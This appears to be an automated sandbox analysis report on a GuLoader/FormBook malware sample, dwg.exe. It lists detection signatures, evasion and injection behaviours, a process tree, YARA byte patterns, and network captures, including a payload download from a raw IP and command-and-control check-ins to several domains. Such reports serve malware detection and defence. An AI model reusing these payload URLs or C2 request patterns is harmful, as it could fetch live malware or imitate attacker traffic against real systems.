Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report dwg.exe

Overview

General Information

Sample Name:dwg.exe
Analysis ID:358411
MD5:6a9035b7435c6aa9e6c8e31cf771e316
SHA1:16a6d2ac44b8ac3cbe112916d8cd9912d3f0dbf7
SHA256:6f33f5e3a23420dacdc26fb8e2eef07fe482e634d4b832b0917cbe7ed37864f5
Tags:exeGuLoader
Infos:

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • dwg.exe (PID: 5316 cmdline: 'C:\Users\user\Desktop\dwg.exe' MD5: 6A9035B7435C6AA9E6C8E31CF771E316)
    • dwg.exe (PID: 1544 cmdline: 'C:\Users\user\Desktop\dwg.exe' MD5: 6A9035B7435C6AA9E6C8E31CF771E316)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 6456 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 6492 cmdline: /c del 'C:\Users\user\Desktop\dwg.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x197a7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a84a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166d9:$sqlite3step: 68 34 1C 7B E1
    • 0x167ec:$sqlite3step: 68 34 1C 7B E1
    • 0x16708:$sqlite3text: 68 38 2A 90 C5
    • 0x1682d:$sqlite3text: 68 38 2A 90 C5
    • 0x1671b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16843:$sqlite3blob: 68 53 D8 7F 8C
    0000000D.00000002.489632071.0000000000684000.00000004.00000020.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0x4eb8:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 18 entries

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: dwg.exeReversingLabs: Detection: 27%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY
      Source: 13.2.rundll32.exe.4927960.5.unpackAvira: Label: TR/Dropper.Gen
      Source: 13.2.rundll32.exe.6843e8.1.unpackAvira: Label: TR/Dropper.Gen

      Compliance:

      barindex
      Uses 32bit PE filesShow sources
      Source: dwg.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Binary contains paths to debug symbolsShow sources
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000002.510174852.0000000007140000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: dwg.exe, 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp, rundll32.exe, 0000000D.00000002.493208853.000000000450F000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: dwg.exe, rundll32.exe
      Source: Binary string: rundll32.pdb source: dwg.exe, 00000001.00000003.305857961.0000000000A40000.00000004.00000001.sdmp
      Source: Binary string: rundll32.pdbGCTL source: dwg.exe, 00000001.00000003.305857961.0000000000A40000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000002.510174852.0000000007140000.00000002.00000001.sdmp
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop ebx
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.5:49716 -> 45.153.203.33:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=mfN0nzHASLUjgM40ULkNQnoCovlHM9uH9yFdN4Wj+dx/VksqViu7/Odvkv5yi/Rll5ca HTTP/1.1Host: www.buytgp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?iB=oFIukkgM6y8fCONc3B59jjyts4roz7ytDuYjBu/uDkaJWnvjVls8NePE6jnmXGkyfPJd&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1Host: www.delmarranch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?iB=qjvGcpBS9gngfccxw5QFty+eEZUVlIKAvl6NE25MOMcyD1XOvUK5P6Mu22Y8HvedKP3a&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1Host: www.apkiinsurance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=4eJRf0meEh2QJsIJtqwHLZ+h6O4A+owpHjBhWLLxb5QgRA1fgcKJhCeYJGmPUuXRH+xS HTTP/1.1Host: www.bestcroissantinlondon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?iB=S32aJJ0sM1lMGA6PL+NxQgVajUvS6UEY5ruSj9tLVOKy1xB24owBALJS5TkIZYObRZJu&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1Host: www.thakehamwesthorsley.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=TH/8bzDuV8AVYKcu6EMjxEP+4967DPJ7e0pyFpPn9x325Irf837GqTHpIaz8sm/pkTRA HTTP/1.1Host: www.karatetheokinawaway.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 192.0.78.25 192.0.78.25
      Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
      Source: Joe Sandbox ViewASN Name: HENGTONG-IDC-LLCUS HENGTONG-IDC-LLCUS
      Source: global trafficHTTP traffic detected: GET /mb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 45.153.203.33Cache-Control: no-cache
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: global trafficHTTP traffic detected: GET /mb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 45.153.203.33Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=mfN0nzHASLUjgM40ULkNQnoCovlHM9uH9yFdN4Wj+dx/VksqViu7/Odvkv5yi/Rll5ca HTTP/1.1Host: www.buytgp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?iB=oFIukkgM6y8fCONc3B59jjyts4roz7ytDuYjBu/uDkaJWnvjVls8NePE6jnmXGkyfPJd&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1Host: www.delmarranch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?iB=qjvGcpBS9gngfccxw5QFty+eEZUVlIKAvl6NE25MOMcyD1XOvUK5P6Mu22Y8HvedKP3a&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1Host: www.apkiinsurance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=4eJRf0meEh2QJsIJtqwHLZ+h6O4A+owpHjBhWLLxb5QgRA1fgcKJhCeYJGmPUuXRH+xS HTTP/1.1Host: www.bestcroissantinlondon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?iB=S32aJJ0sM1lMGA6PL+NxQgVajUvS6UEY5ruSj9tLVOKy1xB24owBALJS5TkIZYObRZJu&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1Host: www.thakehamwesthorsley.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=TH/8bzDuV8AVYKcu6EMjxEP+4967DPJ7e0pyFpPn9x325Irf837GqTHpIaz8sm/pkTRA HTTP/1.1Host: www.karatetheokinawaway.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: www.buytgp.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Feb 2021 14:35:24 GMTContent-Type: text/htmlContent-Length: 793Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 61 6e 74 20 79 6f 75 72 20 6f 77 6e 20 77 65 62 73 69 74 65 3f 20 7c 20 31 32 33 20 52 65 67 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 2d 75 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 65 74 20 6f 6e 6c 69 6e 65 20 77 69 74 68 20 57 65 62 73 69 74 65 20 42 75 69 6c 64 65 72 21 20 43 72 65 61 74 65 20 61 20 66 72 65 65 20 32 2d 70 61 67 65 20 77 65 62 73 69 74 65 20 74 6f 20 67 6f 20 77 69 74 68 20 79 6f 75 72 20 6e 65 77 20 64 6f 6d 61 69 6e 2e 20 53 74 61 72 74 20 6e 6f 77 20 66 6f 72 20 66 72 65 65 2c 20 6e 6f 20 63 72 65 64 69 74 20 63 61 72 64 20 72 65 71 75 69 72 65 64 21 22 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2f 73 74 79 6c 65 73 68 65 65 74 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 31 32 33 2d 72 65 67 2d 6e 65 77 2d 64 6f 6d 61 69 6e 2e 63 6f 2e 75 6b 2f 69 66 72 61 6d 65 2e 68 74 6d 6c 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en-GB"><head><title>Want your own website? | 123 Reg</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="ROBOTS" content="NOINDEX, NOFOLLOW"><meta name="description" content="Get online with Website Builder! Create a free 2-page website to go with your new domain. Start now for free, no credit card required!"/> <meta n
      Source: dwg.exe, 00000001.00000002.307944925.00000000009F7000.00000004.00000020.sdmpString found in binary or memory: http://45.153.203.33/
      Source: dwg.exe, 00000001.00000002.307944925.00000000009F7000.00000004.00000020.sdmpString found in binary or memory: http://45.153.203.33/53321935-2125563209-4053062332-1002
      Source: dwg.exeString found in binary or memory: http://45.153.203.33/mb.bin
      Source: dwg.exe, 00000001.00000002.307944925.00000000009F7000.00000004.00000020.sdmpString found in binary or memory: http://45.153.203.33/mb.binI;
      Source: dwg.exe, 00000001.00000002.307944925.00000000009F7000.00000004.00000020.sdmpString found in binary or memory: http://45.153.203.33/mb.bintSkm
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
